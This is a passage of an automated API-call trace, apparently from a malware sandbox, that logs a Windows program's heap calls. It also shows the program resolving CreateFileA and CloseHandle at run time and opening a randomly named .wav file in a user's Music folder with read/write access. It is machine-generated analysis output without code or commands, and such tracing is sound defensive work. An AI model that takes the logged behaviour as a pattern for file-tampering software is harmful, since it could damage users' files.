(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0186.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0186.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.995] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0186.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0186.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", cchWideChar=90, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 90 [0186.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5a) returned 0x9a5d78 [0186.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", cchWideChar=90, lpMultiByteStr=0x9a5d78, cbMultiByte=90, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", lpUsedDefaultChar=0x0) returned 90 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.996] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\obhgwh4nj0pk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=90, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb4) returned 0x8fabc0 [0186.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=90, lpWideCharStr=0x8fabc0, cchWideChar=90 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav") returned 90 [0186.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fabc0 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0186.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0186.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0186.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0186.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0186.999] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.000] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0187.001] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0187.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.002] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.002] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0187.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.003] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0187.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.003] CloseHandle (hObject=0x120) returned 1 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.003] RtlAllocateHeap 